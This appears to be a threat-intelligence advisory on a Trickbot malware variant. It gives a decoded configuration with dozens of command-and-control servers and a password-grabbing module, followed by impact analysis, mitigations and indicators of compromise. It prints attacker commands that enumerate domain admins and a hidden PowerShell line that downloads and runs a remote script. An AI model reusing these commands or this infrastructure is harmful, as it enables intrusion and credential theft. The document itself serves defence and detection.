Trickbot Gtag lib693/tt0002
./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini
Searching the charset...
[+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy
<mcconf>
<ver>1000503</ver>
<gtag>tt0002</gtag>
<servs>
<srv>5.182.210.226:443</srv>
<srv>192.210.226.106:443</srv>
<srv>51.254.164.244:443</srv>
<srv>45.148.120.153:443</srv>
<srv>195.123.239.67:443</srv>
<srv>194.5.250.150:443</srv>
<srv>217.12.209.200:443</srv>
<srv>185.99.2.221:443</srv>
<srv>51.254.164.245:443</srv>
<srv>185.62.188.159:443</srv>
<srv>46.17.107.65:443</srv>
<srv>185.20.185.76:443</srv>
<srv>185.203.118.37:443</srv>
<srv>146.185.253.178:443</srv>
<srv>185.14.31.252:443</srv>
<srv>185.99.2.115:443</srv>
<srv>172.245.156.138:443</srv>
<srv>51.89.73.158:443</srv>
<srv>190.214.13.2:449</srv>
<srv>181.140.173.186:449</srv>
<srv>181.129.104.139:449</srv>
<srv>181.113.28.146:449</srv>
<srv>181.112.157.42:449</srv>
<srv>170.84.78.224:449</srv>
<srv>200.21.51.38:449</srv>
<srv>46.174.235.36:449</srv>
<srv>36.89.85.103:449</srv>
<srv>181.129.134.18:449</srv>
<srv>186.71.150.23:449</srv>
<srv>131.161.253.190:449</srv>
<srv>200.127.121.99:449</srv>
<srv>114.8.133.71:449</srv>
<srv>119.252.165.75:449</srv>
<srv>121.100.19.18:449</srv>
<srv>202.29.215.114:449</srv>
<srv>180.180.216.177:449</srv>
<srv>171.100.142.238:449</srv>
<srv>186.232.91.240:449</srv>
<srv>181.196.207.202:449</srv>
</servs>
<autorun>
<module name="pwgrab"/>
</autorun>
</mcconf>
%WINDIR%\system32\cmd.exe /C net group "enterprise admins" /domain
%WINDIR%\system32\cmd.exe /C net group "domain admins" /domain
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))"
AI Analysis
Technical Summary
The Trickbot Gtag lib693/tt0002 is a variant of the Trickbot malware family, a well-known modular banking Trojan and malware loader primarily used for credential theft, lateral movement, and payload delivery. The provided configuration snippet reveals a decoded configuration file (settings.ini) that includes a unique charset used for decoding, a version identifier (1000503), and a gtag (tt0002) which likely denotes a specific campaign or variant. The configuration lists multiple command and control (C2) servers distributed globally, using ports 443 and 449, indicating encrypted or disguised communication channels to evade detection. The autorun module specified is "pwgrab," which suggests the malware is configured to steal passwords or credentials from infected systems. The command line snippet shows execution of Windows commands to enumerate privileged groups such as "enterprise admins" and "domain admins" in the domain, followed by a PowerShell command that downloads and executes a remote script from an external IP address (http://66.42.99.79:80/q). This behavior is consistent with Trickbot’s known tactics of reconnaissance, credential harvesting, and subsequent deployment of additional payloads, potentially including Cobalt Strike beacons, as indicated by the tags. The malware leverages system utilities (cmd.exe, powershell.exe) with hidden windows and no profile loading to avoid user detection. No patches or known exploits are associated with this variant, and it does not require user interaction once executed, relying on prior infection vectors. The severity is marked as low in the source data, but this likely reflects the initial infection stage rather than the full impact potential of the malware family. Trickbot’s modular nature allows it to evolve and deploy additional malicious modules, making it a persistent threat in enterprise environments.
Potential Impact
For European organizations, the Trickbot Gtag lib693/tt0002 variant poses significant risks primarily through credential theft and lateral movement within corporate networks. Successful infections can lead to compromise of privileged accounts such as domain and enterprise administrators, enabling attackers to escalate privileges, move laterally, and deploy further payloads including ransomware or espionage tools. This can result in data breaches, operational disruption, and financial losses. The use of encrypted C2 channels and multiple fallback servers complicates detection and mitigation efforts. Given Trickbot’s history of targeting financial institutions, healthcare, and critical infrastructure, European organizations in these sectors are particularly at risk. The malware’s ability to download and execute remote scripts means attackers can adapt payloads dynamically, increasing the threat’s persistence and impact. Additionally, the presence of Cobalt Strike tooling suggests potential for advanced post-exploitation activities, including network reconnaissance and exfiltration. The low initial severity rating does not fully capture the threat’s potential to facilitate high-impact attacks, especially in complex enterprise environments with Active Directory domains. The threat also poses risks to supply chains and managed service providers within Europe, which can amplify the impact through interconnected networks.
Mitigation Recommendations
1. Implement robust network segmentation to limit lateral movement by malware that has compromised credentials.
2. Enforce least privilege and regularly audit membership of privileged groups such as 'enterprise admins' and 'domain admins' to reduce the attack surface.
3. Deploy endpoint detection and response (EDR) tooling capable of detecting suspicious PowerShell activity, command-line abuse, and unusual network connections to known Trickbot C2 IP addresses and ports (443, 449).
4. Use threat intelligence feeds to block or monitor traffic to the IP addresses listed in the malware configuration, especially those associated with Trickbot C2 infrastructure.
5. Harden PowerShell usage by enabling constrained language mode, disabling Office macros, and restricting execution policies to prevent unauthorized script execution.
6. Maintain credential hygiene, including multi-factor authentication (MFA) for all privileged accounts and frequent password changes.
7. Monitor Active Directory logs for unusual queries or enumeration commands targeting privileged groups.
8. Employ network traffic analysis tools to detect encrypted outbound connections to suspicious IPs and ports, and implement egress filtering to restrict unauthorized external communications.
9. Provide targeted user awareness training on phishing and social engineering, as Trickbot often uses these vectors for initial infection.
10. Prepare and test incident response plans that specifically address credential theft and lateral movement scenarios, to enable rapid containment and remediation.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium
Indicators of Compromise
- ip: 66.42.99.79
- url: http://66.42.99.79:80/q
- text: %WINDIR%\system32\cmd.exe /C net group "enterprise admins" /domain
- text: %WINDIR%\system32\cmd.exe /C net group "domain admins" /domain
- text: %WINDIR%\system32\net1 config workstation
- text: %WINDIR%\System32\cmd.exe /c nltest /domain_trusts
- text: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))"
- link: https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/
Technical Details
- Threat Level: 3
- Analysis: 0
- Uuid: 5e70a28a-d97c-47f6-a229-40990a0a020f
- Original Timestamp: 1621850733
Threat ID: 682c7adee3e6de8ceb779223
Added to database: 5/20/2025, 12:51:42 PM
Last enriched: 6/19/2025, 2:19:30 PM
Last updated: 8/1/2025, 10:09:22 AM